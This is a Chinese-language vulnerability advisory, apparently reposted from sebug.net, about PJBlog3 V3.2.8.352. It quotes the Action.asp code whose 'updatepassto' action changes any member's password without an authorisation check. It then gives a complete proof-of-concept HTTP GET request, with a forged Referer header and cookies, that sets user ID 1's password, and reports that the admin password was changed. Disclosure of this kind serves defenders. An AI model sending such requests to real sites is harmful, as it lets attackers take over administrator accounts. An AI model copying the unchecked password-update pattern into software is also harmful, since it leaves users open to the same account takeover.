PJBlog一套开源免费的中文个人博客系统程序,采用asp+Access的技术,具有相当高的运作效能以及更新率,也支持目前Blog所使用的新技术 在文件Action.asp中: ElseIf Request.QueryString("action") = "updatepassto" Then //第307行 If ChkPost() Then Dim e_Pass, e_RePass, e_ID, e_Rs, e_hash, d_pass e_ID = CheckStr(UnEscape(Request.QueryString("id"))) e_Pass = CheckStr(UnEscape(Request.QueryString("pass"))) e_RePass = CheckStr(UnEscape(Request.QueryString("repass"))) Set e_Rs = Server.CreateObject("Adodb.Recordset") e_Rs.open "Select * From [blog_Member] Where [mem_ID]="&e_ID, Conn, 1, 3 e_hash = e_Rs("mem_salt") d_pass = SHA1(e_Pass&e_hash) e_Rs("mem_Password") = d_pass e_Rs.update e_Rs.Close Set e_Rs = nothing response.Write("1") Else response.write lang.Err.info(999) End If 程序在修改用户的密码时,没有对用户的合法权限做验证,导致攻击者可以修改任意用户的密码。 测试方法: //需修改Referer值通过程序检测 GET /action.asp?action=updatepassto&id=1&pass=123456&repass=test HTTP/1.1 Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: http://127.0.0.1/test.htm Accept-Language: zh-cn UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler 4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727) Host: 127.0.0.1 Connection: Keep-Alive Cookie: PJBlog3Setting=ViewType=normal; PJBlog3=memRight=000000110000&memHashKey=&memName=&DisValidate=False&memLastpost=2009%2D11%2D08+11%3A18%3A27&exp=2010%2D11%2D8&Guest=%7Brecord%3Atrue%2Cusername%3A%27test%27%2Cuseremail%3A%27ww%40126%2Ecom%27%2Cuserwebsite%3A%27http%3A%2F%2Fwww%2Ebaidu%2Ecom%2Findex%3F%26lt%3Bfff%26gt%3B%27%7D; ASPSESSIONIDASDSSADD=DAMNKLBDKADFCKOGKEJOKJPP; ASPSESSIONIDCQCQTBCD=MOJFLCCDBICHALBBGGMMENML (测试结果:成功修改管理密码) 影响版本: PJBlog3 V3.2.8.352 Form:www.sebug.net |